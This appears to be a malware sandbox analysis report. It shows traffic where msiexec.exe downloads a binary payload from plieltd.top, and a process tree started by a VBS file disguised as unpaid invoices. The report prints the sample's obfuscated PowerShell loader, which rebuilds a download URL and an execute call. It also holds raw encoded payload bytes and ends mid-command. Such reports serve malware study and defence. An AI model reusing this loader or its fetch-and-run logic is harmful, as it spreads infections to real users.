                                                              2024-10-21 12:17:02 UTC1369INData Raw: 44 43 55 75 68 4d 6b 4a 6f 33 70 56 57 5a 6f 31 61 42 6a 48 32 76 54 72 4b 38 4f 6c 75 43 75 71 4f 38 42 4d 58 2f 55 6b 64 48 4f 68 76 76 7a 68 6c 67 4e 31 61 2f 4c 4c 52 48 78 55 44 6d 51 66 61 6e 5a 34 62 6a 32 45 4f 52 30 74 41 6c 6c 44 32 50 4c 31 4b 4b 6f 72 4e 44 59 69 5a 76 66 39 63 68 36 37 4c 69 4a 53 44 66 33 4f 79 61 77 58 75 48 68 68 4a 36 67 5a 57 36 42 43 46 4d 77 71 53 68 32 36 61 41 2f 2f 57 66 47 43 61 76 32 49 4e 32 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 5a 58 79 4a 4d 47 49 53 6c 79 49 66 64 4d 61 61 36 78 33 69 48 75 2b 6c 65 6b 54 6d 38 4f 75 68 2f 4e 46 6c 54 45 67 6c 69 6b 6f 2f 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32
                                                              Data Ascii: DCUuhMkJo3pVWZo1aBjH2vTrK8OluCuqO8BMX/UkdHOhvvzhlgN1a/LLRHxUDmQfanZ4bj2EOR0tAllD2PL1KKorNDYiZvf9ch67LiJSDf3OyawXuHhhJ6gZW6BCFMwqSh26aA//WfGCav2IN2k9vhXpPb4V6T2+Fek9vhXpPb4V6T2+Fek9vhXpPZXyJMGISlyIfdMaa6x3iHu+lekTm8Ouh/NFlTEgliko/hXpPb4V6T2+Fek9vhXpPb4V6T2
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 78 56 6c 67 77 30 32 4b 36 5a 6c 4b 66 57 54 37 70 50 4a 74 57 6c 71 2b 78 53 38 77 5a 6c 4a 51 58 4f 35 71 51 4a 65 61 52 6b 51 77 61 61 39 57 70 78 74 71 33 76 5a 64 4a 62 68 4f 73 57 53 69 6d 46 72 71 6c 78 6a 52 36 36 59 55 41 61 35 33 63 4e 62 6e 53 42 74 34 72 39 54 48 50 72 4a 44 35 56 56 2f 38 2b 32 2f 4c 46 6f 48 6b 71 37 42 52 47 56 36 54 35 66 4e 79 46 39 50 67 4f 49 54 57 6a 33 44 6b 59 2b 56 65 6b 6e 75 50 30 74 66 53 51 4c 43 65 32 4c 35 76 6f 65 76 66 69 48 66 67 78 74 52 2b 65 63 48 33 73 58 47 79 6f 44 66 65 78 57 65 66 6d 34 6b 52 54 47 6d 75 57 74 55 2f 70 53 39 70 65 32 35 51 6d 30 64 33 57 6b 4e 4c 67 65 67 68 66 39 35 43 53 4c 50 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70
                                                              Data Ascii: xVlgw02K6ZlKfWT7pPJtWlq+xS8wZlJQXO5qQJeaRkQwaa9Wpxtq3vZdJbhOsWSimFrqlxjR66YUAa53cNbnSBt4r9THPrJD5VV/8+2/LFoHkq7BRGV6T5fNyF9PgOITWj3DkY+VeknuP0tfSQLCe2L5voevfiHfgxtR+ecH3sXGyoDfexWefm4kRTGmuWtU/pS9pe25Qm0d3WkNLgeghf95CSLPhXpPb4V6T2+Fek9vhXpPb4V6T2+Fek9vhXp
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 58 73 51 64 58 30 33 4f 53 35 74 32 69 71 6e 5a 47 5a 4d 76 51 68 78 72 57 79 4a 43 65 46 32 43 41 77 65 36 31 44 65 46 65 42 50 6a 46 6e 39 4a 6c 72 70 35 71 39 70 47 6d 33 68 45 47 2b 56 65 6b 53 45 6b 34 38 79 35 35 75 54 33 47 5a 33 49 6c 4d 4a 31 75 4f 51 42 35 6f 64 69 4f 72 66 36 64 51 77 68 57 70 50 5a 7a 34 6c 54 33 2b 46 66 52 33 78 44 47 44 2f 4c 34 6d 37 4a 68 6e 47 72 75 50 5a 4d 5a 4d 32 53 75 2f 67 56 55 42 6b 56 47 55 54 6c 5a 6e 57 2b 36 4e 38 49 67 68 4b 38 71 6b 4f 39 62 31 46 4c 79 41 42 76 65 42 33 64 49 64 77 39 79 31 45 6a 35 31 6c 4f 62 2f 6b 7a 36 64 78 63 33 4c 48 4e 4c 42 44 68 2f 47 31 36 66 61 35 35 75 5a 49 58 78 69 45 35 35 39 36 75 45 31 57 6b 73 6d 59 31 63 55 64 38 76 35 48 31 66 30 66 63 5a 2f 6d 66 67 58 33 75 36 32 30
                                                              Data Ascii: XsQdX03OS5t2iqnZGZMvQhxrWyJCeF2CAwe61DeFeBPjFn9Jlrp5q9pGm3hEG+VekSEk48y55uT3GZ3IlMJ1uOQB5odiOrf6dQwhWpPZz4lT3+FfR3xDGD/L4m7JhnGruPZMZM2Su/gVUBkVGUTlZnW+6N8IghK8qkO9b1FLyABveB3dIdw9y1Ej51lOb/kz6dxc3LHNLBDh/G16fa55uZIXxiE5596uE1WksmY1cUd8v5H1f0fcZ/mfgX3u620
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 74 53 62 58 4f 6a 45 39 39 74 55 4f 71 65 4b 59 39 35 36 55 54 70 39 77 38 32 61 52 77 46 72 6d 7a 53 6d 2b 67 49 70 7a 58 73 6e 69 35 4b 49 5a 7a 37 61 45 78 2f 6f 55 55 4a 65 49 54 69 4d 2b 47 67 61 45 6f 39 61 51 30 72 62 46 65 58 6f 30 5a 70 61 33 51 47 78 78 6a 66 59 50 71 4d 65 39 6d 67 57 39 4d 5a 39 50 4e 34 72 33 55 37 34 4c 31 42 35 35 64 57 6b 48 49 31 44 44 46 4e 74 6b 51 7a 32 37 78 4b 6c 58 6a 49 38 73 73 49 4a 35 59 34 44 69 77 2f 57 75 6f 45 62 6c 78 6d 6f 33 31 6c 4b 57 5a 2b 46 41 64 78 62 6c 43 52 54 73 31 6b 72 57 74 78 2b 79 70 47 54 65 52 76 66 4b 79 70 30 30 6a 30 71 76 59 64 4d 54 6b 67 48 6c 32 2b 58 67 67 35 68 5a 2f 46 5a 31 38 77 31 4d 53 45 34 50 43 51 34 49 35 63 72 74 61 6b 4a 6b 4d 67 78 72 69 66 68 58 63 4d 43 72 2f 6e 4d
                                                              Data Ascii: tSbXOjE99tUOqeKY956UTp9w82aRwFrmzSm+gIpzXsni5KIZz7aEx/oUUJeITiM+GgaEo9aQ0rbFeXo0Zpa3QGxxjfYPqMe9mgW9MZ9PN4r3U74L1B55dWkHI1DDFNtkQz27xKlXjI8ssIJ5Y4Diw/WuoEblxmo31lKWZ+FAdxblCRTs1krWtx+ypGTeRvfKyp00j0qvYdMTkgHl2+Xgg5hZ/FZ18w1MSE4PCQ4I5crtakJkMgxrifhXcMCr/nM
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 53 69 50 4a 51 43 49 6d 2f 39 36 65 61 45 59 39 30 69 63 4a 52 67 2b 63 35 39 70 63 57 6b 33 67 78 4c 52 33 55 57 32 4b 46 38 30 4f 61 39 75 56 53 7a 32 50 74 5a 31 54 39 4a 6a 49 65 58 52 37 73 6e 49 76 68 71 42 4b 78 54 78 55 31 51 77 75 41 6d 6c 54 6b 56 55 42 4e 77 34 70 74 5a 57 67 6a 34 63 4e 48 63 4b 53 5a 66 69 58 67 41 62 41 73 6a 38 31 6e 63 50 43 66 55 57 77 39 5a 4c 5a 39 6f 63 37 58 2f 33 38 58 44 73 78 41 75 50 59 6b 43 6b 56 74 4a 58 4a 57 67 2b 6d 71 42 30 5a 35 56 51 58 34 58 44 59 69 53 6d 30 31 36 33 34 51 54 6c 52 72 42 47 71 38 6c 42 68 6d 69 36 74 47 63 4e 36 44 4a 5a 43 43 55 45 59 79 50 42 4e 4b 72 74 32 69 48 61 49 53 55 45 70 4c 61 72 42 48 6d 6c 50 75 54 32 62 53 55 63 68 30 47 4d 4f 33 6d 56 65 31 54 39 57 43 33 38 39 32 50 36
                                                              Data Ascii: SiPJQCIm/96eaEY90icJRg+c59pcWk3gxLR3UW2KF80Oa9uVSz2PtZ1T9JjIeXR7snIvhqBKxTxU1QwuAmlTkVUBNw4ptZWgj4cNHcKSZfiXgAbAsj81ncPCfUWw9ZLZ9oc7X/38XDsxAuPYkCkVtJXJWg+mqB0Z5VQX4XDYiSm01634QTlRrBGq8lBhmi6tGcN6DJZCCUEYyPBNKrt2iHaISUEpLarBHmlPuT2bSUch0GMO3mVe1T9WC3892P6


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449744172.67.155.1394431012C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-21 12:17:39 UTC182OUTGET /ZPepSmQfDUPElVSkiams84.bin HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: plieltd.top
                                                              Cache-Control: no-cache
                                                              2024-10-21 12:17:40 UTC989INHTTP/1.1 200 OK
                                                              Date: Mon, 21 Oct 2024 12:17:40 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 494656
                                                              Connection: close
                                                              Last-Modified: Mon, 21 Oct 2024 10:21:43 GMT
                                                              ETag: "78c40-624fa04f28d55"
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: MISS
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Un5VCbvftvbYdlHfAzOPOjHDWcNcn%2BkE%2B6NhG6gxqSngZpnj7easPuGTJmmf5%2BOG1%2FTXeDU5zSnEp2qssN%2FDTD%2BrZpDSpXAwo%2B07ampRHWCNa9eb6%2FgcXrLNorp9LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                              X-Content-Type-Options: nosniff
                                                              Server: cloudflare
                                                              CF-RAY: 8d612f8e9de3a915-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=820&delivery_rate=2339256&cwnd=251&unsent_bytes=0&cid=4f695cf4000a8996&ts=885&x=0"
                                                              2024-10-21 12:17:40 UTC380INData Raw: 6e aa 4d 06 23 14 ef 5a 60 13 a2 00 34 03 0e 15 60 0e 19 09 8e b7 fe 6f f4 b6 05 64 8f d5 59 2d 92 71 43 d8 04 da db ae 9a b7 e1 d5 25 fe 2f a7 11 f9 62 17 c5 82 2a 33 84 61 6f 5d 2f 40 d0 c6 c2 16 0b e5 30 d2 84 91 fd d6 7e 09 7e 87 42 e5 ec 46 e9 a2 58 6a 9f 4b de a5 3f c2 f4 42 ba 1f 07 48 81 54 ec 44 8a 4e 65 f4 d5 27 61 ea 9c 4a f0 26 5d c2 ae 54 e2 1d 46 e1 b9 69 11 7f 82 55 fc d3 9a 9e 2e e3 d9 1d 1b a2 1d 14 92 4b 0f 70 2d a0 2a 54 08 df 15 b9 cd 53 a1 52 9e 42 3c 44 f8 2e be e6 6d 65 39 27 06 df 49 6e 6a f6 57 d6 74 2c 8b 11 0b 04 48 c9 c8 81 a9 07 53 57 0a b8 79 72 ae 43 76 a4 12 1e 4d f6 28 e6 c9 ec d4 ea 3e 59 d2 03 61 67 ee 17 d9 2b 27 6d b3 19 3d 33 e3 34 ae d6 24 e8 20 8f f7 7d aa f1 e0 6c fc 71 ea ea 2d 4c 47 e3 6b 23 37 55 0b e2 c5 e7 fc
                                                              Data Ascii: nM#Z`4`odY-qC%/b*3ao]/@0~~BFXjK?BHTDNe'aJ&]TFiU.Kp-*TSRB<D.me9'InjWt,HSWyrCvM(>Yag+'m=34$ }lq-LGk#7U
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 79 15 9e c6 ad a3 2b ab a3 c5 7f 0c e5 bc 76 37 55 0a 90 0c ca d9 16 7b 02 ad 33 c0 75 aa 9d e9 ed ad 8e 51 85 4a 21 a3 44 00 0d 95 40 96 c4 7f c4 b2 93 0f 07 2a 3f 7d 42 cc 74 b0 bb a7 65 74 cc e6 73 2b d1 14 9f 0c af 37 b0 86 d8 41 af 5a a6 80 d4 39 cb ea 99 f6 90 db 69 ba e1 98 cf 6d 67 8b 00 bd c7 59 7a c3 ef 7a dc c7 a9 1e b5 0b 5c 3f 18 21 57 c6 2e 99 e7 e2 50 a2 46 03 4d 2d c6 b5 2a c3 2c 06 2d 04 ec 8a 03 f7 68 db 05 01 57 3b b4 ec 45 eb 77 09 62 77 1a b5 57 f0 85 22 b5 09 95 60 d9 19 11 04 18 33 9a fa 02 bb 42 2f d6 24 8c c3 19 2a 59 b9 9f 38 0c 73 01 9f 02 0f 3f 0a 26 31 84 e3 6d ba a1 8d 79 c6 bf c3 68 98 b8 d5 ce 17 c6 77 20 25 65 08 e1 2e 02 88 66 35 4f fb 64 7d 98 95 43 ec f2 be be 8b 38 09 88 5d b2 4e e4 c5 17 40 92 73 6f 37 0e ef 28 64 6b
                                                              Data Ascii: y+v7U{3uQJ!D@*?}Btets+7AZ9imgYzz\?!W.PFM-*,-hW;EwbwW"`3B/$*Y8s?&1myhw %e.f5Od}C8]N@so7(dk
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 28 c3 7b 55 3a 0c 0d 4d 46 34 55 53 13 b5 4a 9a 51 7b ea 9c 3d c0 70 c2 7e 69 a8 ad 66 1a b5 49 20 fa 87 6a 0d 2c 68 db 8b 7f 2c 62 19 0f 07 e9 55 7d f9 54 27 77 bb 4f 53 40 cc f6 1b da 51 51 8f e4 89 12 b3 86 81 82 16 42 e2 c7 d4 d1 33 e7 99 f6 f8 20 e9 ff 59 9e d9 58 60 8a 59 7e ad c9 c4 f3 b7 76 dc 2f 51 2d b5 0b 34 3a 99 64 57 2e d6 ad e4 e2 09 61 ff 2b 1e 6a 0e 66 5b cf 7c d5 43 0b 55 cf 03 1f 8a ef 06 01 0e f8 0d 5c 11 ac 77 e1 39 7b 1a b5 db 3a 02 67 ad e1 59 54 52 ca 4e c7 e1 d3 ce bd 02 53 dc 22 d6 24 e4 e0 98 ff 5c 51 29 09 0f 73 58 5c bb 77 6a 4d 26 d9 0c ee 6d ba c9 a0 f8 83 bf 2b c8 ac bb d5 97 d4 82 03 fc a5 45 4f e1 c6 7f ca 63 35 27 dc e5 38 98 0f ce d8 f1 ba e7 48 52 09 31 c5 e7 09 e4 2d 67 73 92 73 27 76 8f ca 06 fe 7f 2d 8f 4c 66 53 40
                                                              Data Ascii: ({U:MF4USJQ{=p~ifI j,h,bU}T'wOS@QQB3 YX`Y~v/Q-4:dW.a+jf[|CU\w9{:gYTRNS"$\Q)sX\wjM&m+EOc5'8HR1-gss'v-LfS@
                                                              2024-10-21 12:17:40 UTC1369INData Raw: b3 7b 8c 02 d5 20 97 0c 41 38 ab 23 4f e8 33 96 fb 67 74 89 eb ad 8e da 48 a2 b1 a4 44 00 86 a8 d4 fb 8b 7f 4f 68 52 ec 02 a1 f2 2b 43 37 9c 74 bd a7 75 ff 04 1e f0 2c d1 14 06 0b 0e a7 9a c1 d8 c8 e8 5e 85 40 be 19 9c 63 de fe 19 9c 65 33 1e 66 40 2a 77 75 35 75 ed 8e 7d 3c f6 59 48 82 a9 bf 21 46 1b 3f 72 01 54 05 7e 66 d2 2a 7a e5 46 1c 5f 7d 9a cb 2a 9c 22 88 70 c7 81 01 ef 74 8c 23 61 a0 7b 3b b4 ec c4 07 ab 09 62 77 91 bd 12 f3 e8 65 ad 5a c3 53 8a 9d a8 54 33 74 9a c1 83 bf 42 2f d6 5a a3 7d c9 d1 1b b9 c9 d5 b6 58 02 9f 81 32 ef 61 61 31 7b ba 18 a0 f2 06 b6 2e fa ed 68 98 d0 65 b1 52 e8 eb 00 72 12 08 b8 78 1f a1 48 36 4f b2 e9 31 bc f7 ae fe fa ba be 00 7d 05 a5 e3 b1 4e e4 ca 93 3a 93 73 4f 7f 8d 67 07 19 8a 6f 8d 4c 3f 10 c4 ce b7 e1 ee 0b cf
                                                              Data Ascii: { A8#O3gtHDOhR+C7tu,^@ce3f@*wu5u}<YH!F?rT~f*zF_}*"pt#a{;bweZST3tB/Z}X2aa1{.heRrxH6O1}N:sOgoL?
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 54 28 62 c9 16 7b 68 ff 63 28 e4 26 9f e9 6e 69 9e dc 04 6e 80 a3 44 00 80 d9 64 9e 9c 97 ee b5 93 0f 6f 0a 61 3b 40 41 20 14 97 2a f9 50 40 f6 73 2b 39 65 10 0d af 77 da da 62 25 e2 1d b6 0d 98 1d b7 02 7a e7 90 db 30 31 89 fb 85 49 03 62 0a af c7 c9 24 48 33 bc 90 e3 ed f6 d8 19 5c 3f 41 71 da 8a 0a 8d 0f 83 51 a2 46 6e 06 09 4e 66 64 c2 7c d5 a6 48 f0 d2 eb b2 69 db 05 8c 1b 1f c4 04 79 ea 77 09 ef fb 3e 3d b3 23 83 ca 9d 08 95 60 dc 86 33 2c b0 c5 9b fa 02 36 0e 0b c6 cc 95 c2 19 ba e2 31 b5 7a 0c f8 c9 14 d4 e7 4b f6 d9 ce ee c3 3b 45 94 4d 53 81 bf 3c 7d f4 2c 90 ce ae 94 4e 02 5d f9 91 e0 2e f7 93 43 96 c7 c1 23 7d 39 23 6c ab f2 ec 41 be f8 23 cf 5d 11 c2 ce 82 17 73 52 d0 df 1d 49 8f a5 82 25 5e 8c ef a7 ba be 4a 3e 3a c4 4d ba 2d 51 81 af 9e f2
                                                              Data Ascii: T(b{hc(&ninDdoa;@A *P@s+9ewb%z01Ib$H3\?AqQFnNfd|Hiyw>=#`3,61zK;EMS<},N].C#}9#lA#]sRI%^J>:M-Q
                                                              2024-10-21 12:17:40 UTC1369INData Raw: ea c1 cc 3f 8f 21 54 01 20 a9 8e 51 dd 11 ab 6d ac d6 09 95 40 49 b8 5b c8 3d 5d c8 07 2d 3f 7d 40 24 e5 35 bb a7 2b b6 c4 f6 25 7c 5a e5 67 4c 50 d8 4f 0d 20 16 24 95 5e 09 d0 39 cb ba 12 38 78 f5 96 45 a6 fd 01 85 f1 8e 00 bd 4c 86 6d 4e e7 79 57 8b 8d 0e e5 e3 08 3b 18 21 dc 82 0a 95 b8 bc 92 a6 46 b5 c1 dc e6 88 d5 3c 83 85 a0 cc 3c db 07 f7 68 8b 8e cf bf cd 4a 13 ba 60 bf e1 38 73 1a b5 38 6f a7 2e fd e1 b7 64 51 ca 9c 40 7c 3b c4 38 06 bb 11 7a 80 73 07 bf 3d ae d7 60 14 f2 e4 37 05 9f 02 84 d7 81 e9 b2 f9 e3 65 c9 82 65 9e 38 40 3c e3 90 f9 84 45 d8 00 e6 b8 a2 ee 58 6a e5 1f 24 9e ca b0 bb 8c 2a 6a 18 b9 6f 36 b6 55 a3 d0 c4 75 a2 4d c5 14 4e dc 16 7a b0 b2 c8 f1 df ee 1c 02 19 8c 15 6f 1b 32 a2 1c 58 11 f5 31 1a ac 86 36 db f2 f2 79 13 68 91 fa
                                                              Data Ascii: ?!T Qm@I[=]-?}@$5+%|ZgLPO $^98xELmNyW;!F<<hJ`8s8o.dQ@|;8zs=`7ee8@<EXj$*jo6UuMNzo2X16yh
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 74 64 12 52 71 68 b0 39 33 28 8b e8 39 6f bf 49 47 b0 3b 86 c5 e7 d0 28 3f 7d ab fe f4 4c 9f b7 75 00 d3 75 8d 23 a2 0e 04 c3 47 32 4a 79 27 ca 60 d1 b6 bb 24 36 89 2c c9 9c 91 33 70 40 a6 89 22 61 e6 7c 75 b7 91 42 b2 2b f3 31 dc c7 2c e8 ea 04 c9 ff 46 e3 5f c6 c6 d7 e7 e2 50 6e 13 68 a6 7c 58 66 98 3a 83 2a a0 71 dc 07 4e 0b eb be f9 01 06 b0 7c 65 35 fb 9f f9 9c 88 e5 38 b7 53 d3 ca dd e4 6a 9f 08 93 49 8f bd 6e 58 fe 02 ed c9 de 3e 89 75 3c e6 31 5c 82 db 19 04 01 05 c1 c0 0b 3f 81 e8 d9 84 e7 6d ba 6d e5 25 98 f9 c3 80 f2 92 d6 ce db 6b 7f 61 59 11 5b 6a f7 83 d0 8b bd b6 14 9b 44 dc c3 4e 9e ec ec 35 40 d0 73 71 a2 4d c5 2f 4e e7 a8 fa 8a b0 c8 0d bf 3d 62 2b 15 d2 3a 3b 20 f8 a1 9f 94 2e 51 78 d6 44 bf 6c 50 0b 99 a3 17 e3 5e 99 88 e8 a4 a7 c7 83
                                                              Data Ascii: tdRqh93(9oIG;(?}Luu#G2Jy'`$6,3p@"a|uB+1,F_Pnh|Xf:*qN|e58SjInX>u<1\?mm%kaY[jDN5@sqM/N=b+:; .QxDlP^
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 80 4a 20 1b 1f 2d 4d 95 83 35 81 83 3b 3d ee e7 8c 5f 37 f6 1d c0 f1 eb cf bc 26 ff 03 1e a1 df 2e eb df f3 da cb 58 90 db 41 af 03 e6 68 5a d1 34 15 1a 32 9c b1 69 d0 58 fd 06 85 5f 7c ff 42 4a 8c 91 93 68 fe 34 6e 5a e1 4a 5b b4 cf 1a 21 57 9f 7e 12 28 0a 37 56 b9 1c c1 e5 e6 db 29 c3 7c 5e e4 ec 05 73 fc 08 e1 eb 56 8a 98 d3 21 17 ba 14 fc 44 96 13 93 b8 b3 23 83 22 f2 57 ce eb b4 97 d5 0c 58 59 9a 90 03 30 0f c7 3e cf 79 3c e6 d0 5c d3 9f d5 b6 10 02 9f ce 5e c0 3e 02 d9 99 17 92 45 2a 45 91 8b bf c3 68 ab 6a 97 f5 d5 65 4b ba 52 57 c2 6a ef ae 3a 09 37 b0 9f 40 71 67 93 62 e0 1a 23 56 74 c7 8a 4c 51 70 46 e4 af 16 bf e6 57 43 c8 7a ab 0a fe 8b f1 73 b3 bc 54 f5 88 95 a6 07 14 ba d2 44 b8 d3 c5 f2 71 5f 4a 21 5a 12 15 eb a8 2c 08 e9 77 04 12 ee fd 18
                                                              Data Ascii: J -M5;=_7&.XAhZ42iX_|BJh4nZJ[!W~(7V)|^sV!D#"WXY0>y<\^>E*EhjeKRWj:7@qgb#VtLQpFWCzsTDq_J!Z,w
                                                              2024-10-21 12:17:40 UTC1369INData Raw: 71 b1 50 3d d4 44 1b c1 b2 84 c9 c2 ef 89 bf 33 4d 08 cf b1 1f 75 9b 7d bd c3 ce e2 70 f3 2b e7 c4 8e 8b ca 61 b2 32 76 2b c6 94 b4 c2 34 94 db 3c 31 b5 27 9f e0 26 9e 8b 4c 97 44 30 d3 0b bc dc c7 a9 9a 75 7f 77 b2 5d 29 07 4b 63 95 0f 40 50 a2 46 b3 c7 68 f2 05 e4 93 94 67 da fb 2b da 8e ba 60 33 88 01 57 3b e4 67 8b 03 c8 ff 9d 88 f1 8a 3e 66 93 72 20 44 81 88 d3 ca 17 04 08 be d7 ea ea d2 42 2f d6 74 01 86 11 ea d1 f4 93 d5 6d 73 01 9f 52 82 7a f6 ad ff d4 0b 1c 4b 5e 72 29 4b f2 cb 80 d4 b8 d5 ce 47 63 cd ad 85 12 08 e1 a5 31 a7 e8 d0 12 29 74 7d f2 18 2c ec 0d ce 9a 9b 69 e1 55 59 b2 4e 26 cd 17 a9 a7 9f b0 c8 85 cb 22 12 84 10 b7 44 30 04 39 88 99 a6 65 0b 31 9e 60 ed 10 da 23 89 9d 17 e3 b7 fc 03 33 57 c5 8e bd 9f 1c 99 ef 76 0d 78 c9 cf 30 1b f0
                                                              Data Ascii: qP=D3Mu}p+a2v+4<1'&LD0uw])Kc@PFhg+`3W;g>fr DB/tmsRzK^r)KGc1)t},iUYN&"D09e1`#3Wvx0
                                                              2024-10-21 12:17:40 UTC1369INData Raw: dc 3d 5d 0c c0 7a d7 4a aa 33 8b 33 ff 83 69 77 0f a6 9b 20 0f eb 70 8f 6b 2b e3 79 ac 65 8f d1 78 68 c8 d3 34 15 9a b2 b4 c7 39 52 87 ab 36 92 e0 4e 0c 36 09 9c 95 d9 12 ce 23 98 22 d8 e8 55 07 fd 08 21 dc 08 c6 cc 17 1d af 6e 15 b5 1d 47 0e 05 db 2b 50 25 d4 fb 5f d6 27 ef e3 97 21 15 04 d3 aa 1c ba 14 88 7d 46 6b 91 f9 97 3b d0 ca e6 f8 6a 9f da 04 9c fc b0 8f 73 05 fd 32 06 0b ce af 9c 48 d3 4d 8d 82 50 32 8a f8 01 9f 02 5a b2 26 1c b4 7b 97 17 d0 a1 d8 f2 08 57 80 98 67 47 51 0e 63 84 88 01 79 0d 83 2f d1 c7 11 f3 dc b0 14 34 f6 56 0f ce 05 0d 45 bd 4c 68 e1 e8 80 4d b1 67 01 1b 17 a9 07 6b 2b 7b ae 8d d8 e7 76 65 b3 c0 1d f5 71 18 7d e1 4f 63 59 8a ea f8 8b 1a 2c b6 ec 1c 0e fa cb 11 57 d3 e3 a1 14 50 36 f2 15 0d b5 32 1b 32 1a 7f e2 27 ea 5a f5 6a
                                                              Data Ascii: =]zJ33iw pk+yexh49R6N6#"U!nG+P%_'!}Fk;js2HMP2Z&{WgGQcy/4VELhMgk+{veq}OcY,WP622'Zj


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:08:16:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
                                                              Imagebase:0x7ff620550000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:08:16:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\PING.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:ping gormezl_6777.6777.6777.677e
                                                              Imagebase:0x7ff72db70000
                                                              File size:22'528 bytes
                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:08:16:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:08:16:57
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und 